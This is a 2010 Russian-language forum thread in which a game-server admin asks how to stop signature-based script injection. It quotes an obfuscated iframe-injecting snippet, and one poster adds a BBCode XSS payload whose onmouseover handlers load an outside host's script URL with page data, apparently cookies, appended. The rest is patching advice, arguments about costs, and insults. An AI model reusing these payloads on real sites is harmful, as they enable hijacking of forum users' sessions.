L2J_CE

Вы хотите отреагировать на этот пост ? Создайте аккаунт всего в несколько кликов или войдите на форум.
L2J_CE

L2J_CE Server


Участников: 5

    Взлом сервера через iframe

    avatar
    dashuk


    Сообщения : 63
    Дата регистрации : 2010-03-04

    Взлом сервера через iframe Empty Взлом сервера через iframe

    Сообщение  dashuk Вт Сен 14, 2010 6:33 pm

    Доброе время суток! Хочу спросить,может кто-то сталкивался с таким видом взлома сервера. Злоумышленник регестрируеться на форуме, и в подпись вставляет картинку с прикрытым код шела. Выглядит примерно так:

    Код:
    document.write(\x22\x3C/iframe\x20src=http://lovel2.h1.ru/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=yes\x3E\x3C/iframe\x3E\x22);document.close()}";eval(lol);

    Кто может посоветовать как уберечь сервер от таких видов слития базы.
    ArtiShok
    ArtiShok


    Сообщения : 1144
    Дата регистрации : 2010-03-10

    Взлом сервера через iframe Empty Re: Взлом сервера через iframe

    Сообщение  ArtiShok Вт Сен 14, 2010 6:51 pm

    dashuk пишет:Доброе время суток! Хочу спросить,может кто-то сталкивался с таким видом взлома сервера. Злоумышленник регестрируеться на форуме, и в подпись вставляет картинку с прикрытым код шела. Выглядит примерно так:

    Код:
    document.write(\x22\x3C/iframe\x20src=http://lovel2.h1.ru/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=yes\x3E\x3C/iframe\x3E\x22);document.close()}";eval(lol);

    Кто может посоветовать как уберечь сервер от таких видов слития базы.
    какой форум используешь?
    Просто на IPB 3.0 помоему это исправили, да и на 2.3.6
    avatar
    dashuk


    Сообщения : 63
    Дата регистрации : 2010-03-04

    Взлом сервера через iframe Empty Re: Взлом сервера через iframe

    Сообщение  dashuk Вт Сен 14, 2010 7:53 pm

    IPB 2.3.6
    ArtiShok
    ArtiShok


    Сообщения : 1144
    Дата регистрации : 2010-03-10

    Взлом сервера через iframe Empty Re: Взлом сервера через iframe

    Сообщение  ArtiShok Вт Сен 14, 2010 9:45 pm

    dashuk пишет:IPB 2.3.6
    так скачай доработки есть по этому поводу...
    Liiion911
    Liiion911


    Сообщения : 248
    Дата регистрации : 2010-07-02

    Взлом сервера через iframe Empty Re: Взлом сервера через iframe

    Сообщение  Liiion911 Чт Сен 16, 2010 4:01 am

    ну дык, сам так нубосерверам жизнь порчу, нефиг на халявные сервера, ставить халявные обвязки и халявные форумы и собирать донат )) надо постараца и сделать нормальный проект =Р
    ArtiShok
    ArtiShok


    Сообщения : 1144
    Дата регистрации : 2010-03-10

    Взлом сервера через iframe Empty Re: Взлом сервера через iframe

    Сообщение  ArtiShok Чт Сен 16, 2010 1:50 pm

    Liiion911 пишет:ну дык, сам так нубосерверам жизнь порчу, нефиг на халявные сервера, ставить халявные обвязки и халявные форумы и собирать донат )) надо постараца и сделать нормальный проект =Р
    Laughing прочу так сказать наводишь да?
    avatar
    smolnik0ff


    Сообщения : 13
    Дата регистрации : 2010-08-19

    Взлом сервера через iframe Empty Re: Взлом сервера через iframe

    Сообщение  smolnik0ff Чт Сен 16, 2010 2:07 pm

    Liiion911 пишет:ну дык, сам так нубосерверам жизнь порчу, нефиг на халявные сервера, ставить халявные обвязки и халявные форумы и собирать донат )) надо постараца и сделать нормальный проект =Р

    Увожаемый Liiion911 Вы сказали про халявные сервера от сказки или в вообщем ? Кроде этот форум Про сказку !?
    Если Вас не затруднит Скинте ссылочку на Ваш сервер очень дети мои хочють взгянуть на Ваш проект !!!
    На нашем сервере тоже всё халявное но ведь у сказке нету за денюшки то - или всётаки Вам удалося у него купить чтонить за денюшку !


    С уважением к Вам Все нубы у каторых всё халявное и каторые хотят стать такими как ВЫ !!!
    ArtiShok
    ArtiShok


    Сообщения : 1144
    Дата регистрации : 2010-03-10

    Взлом сервера через iframe Empty Re: Взлом сервера через iframe

    Сообщение  ArtiShok Чт Сен 16, 2010 2:12 pm

    smolnik0ff пишет:
    Liiion911 пишет:ну дык, сам так нубосерверам жизнь порчу, нефиг на халявные сервера, ставить халявные обвязки и халявные форумы и собирать донат )) надо постараца и сделать нормальный проект =Р

    Увожаемый Liiion911 Вы сказали про халявные сервера от сказки или в вообщем ? Кроде этот форум Про сказку !?
    Если Вас не затруднит Скинте ссылочку на Ваш сервер очень дети мои хочють взгянуть на Ваш проект !!!
    На нашем сервере тоже всё халявное но ведь у сказке нету за денюшки то - или всётаки Вам удалося у него купить чтонить за денюшку !


    С уважением к Вам Все нубы у каторых всё халявное и каторые хотят стать такими как ВЫ !!!
    Laughing Laughing Laughing Извините, а хостинг и машина тоже халявны?
    Laughing Зачем создавать свой проект если можно протить чужие Very Happy
    Liiion911
    Liiion911


    Сообщения : 248
    Дата регистрации : 2010-07-02

    Взлом сервера через iframe Empty Re: Взлом сервера через iframe

    Сообщение  Liiion911 Пт Сен 17, 2010 5:03 pm

    smolnik0ff, а еще у меня нет сервера. т.к. я не могу пока вкладывать.
    И еслиб был сервер, то я бы врядли разводил бешеный донат имея в качестве сборки - сказку, в качестве сайта нулленый ДЛЕ или стресс веб с шелами, а в качестве форума, нулленый пхпББ или вБуллетин )

    а особенно улыбнуло что этот код просто открывает ифрейм. и если уж поставили движок на форуме, то настройте ево как надо и по таким вопросам лучше писать в багрепорт или саппорт движка форума а не сервера )))
    avatar
    dashuk


    Сообщения : 63
    Дата регистрации : 2010-03-04

    Взлом сервера через iframe Empty Re: Взлом сервера через iframe

    Сообщение  dashuk Пт Сен 17, 2010 6:28 pm

    А с чего Вы взяли что у меня есть донат?.Можно подумать что все кто открывает сервер, открывает из за доната? Бред! на l2top.ru посмотрите там много серверов есть без доната! Потому и пользуюсь всем халявным чтоб не делать доната только за хостинг плачу ну там копейки. Да и стрес веб можно почистить от шелов не так сложно и в сети есть много мануалов как чистить.
    avatar
    dashuk


    Сообщения : 63
    Дата регистрации : 2010-03-04

    Взлом сервера через iframe Empty Re: Взлом сервера через iframe

    Сообщение  dashuk Пт Сен 17, 2010 6:37 pm

    Liiion911 пишет:
    а особенно улыбнуло что этот код просто открывает ифрейм. и если уж поставили движок на форуме, то настройте ево как надо и по таким вопросам лучше писать в багрепорт или саппорт движка форума а не сервера )))
    Да и пусть Вас так сильно не улыбает это не весь код, это маленькая часть кода, поставил как образец!


    avatar
    smolnik0ff


    Сообщения : 13
    Дата регистрации : 2010-08-19

    Взлом сервера через iframe Empty Re: Взлом сервера через iframe

    Сообщение  smolnik0ff Сб Сен 18, 2010 6:17 am

    А донат как ни крути нужен
    1) сервер средний - 50-60000
    2)Офф ось - Не считая линукса ежели то за винду выложи 3500 - 9000
    3)Сайт купи 5-9000
    4)Сама игрушка покупная от 3000 - средняя я узновал 20000 полная как договоришся да и непродадут её !
    5) геодата ? эта геодата странная вообще от 3000 до 15000 блин а о горантии геодат я незнаю
    Ну в общем где то Самый начальный сервер обойдётся в 130000 штук !!! и бросить их в народ !!?? Думаю не каждый здесь готов пожертвовать денюшками просто так ! да и думаю уже не то время о донате думать как о манне небесной Чтоб сервер раскрутить немало времени уйдёть на это
    Я вот Тут посмотрел сколько за 5 месяцев скачало человек сервер каторый я выложил до сказки на торент
    http://rutracker.org/forum/viewtopic.php?t=2806326 больше 1000 человек ) так скоро вообще играющих не останицца )))

    Но всё равно каждый будет думать о уязвимости и сервера и сайта и т д Так как своё детище каждый хочет защитить даже на 100% халявное )))


    Liiion911
    Liiion911


    Сообщения : 248
    Дата регистрации : 2010-07-02

    Взлом сервера через iframe Empty Re: Взлом сервера через iframe

    Сообщение  Liiion911 Пн Сен 20, 2010 5:54 pm

    [code:1:b764][color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://m-file.tula71.net/test.php?ck=\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]_[/acronym]_[/acronym][/color]
    [color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=location.href="http://m-file.tula71.net/test.php?ck="+document
    maximov
    maximov


    Сообщения : 441
    Дата регистрации : 2010-04-22

    Взлом сервера через iframe Empty Re: Взлом сервера через iframe

    Сообщение  maximov Пт Сен 24, 2010 1:45 pm

    Я считаю что Liiion911 чмошник, который сам не может и другим не дает. Вообще таких людей порицать надо а не вступать в дискуссии. lol!
    Liiion911
    Liiion911


    Сообщения : 248
    Дата регистрации : 2010-07-02

    Взлом сервера через iframe Empty Re: Взлом сервера через iframe

    Сообщение  Liiion911 Ср Окт 06, 2010 8:44 pm

    maximov, если сам не могу, то что мне другим давать ? )) Или я не настолько туп, чтобы понять твой пост или я слишком грустен чтобы оценить твой юмор ))

      Текущее время Пт Окт 04, 2024 3:23 am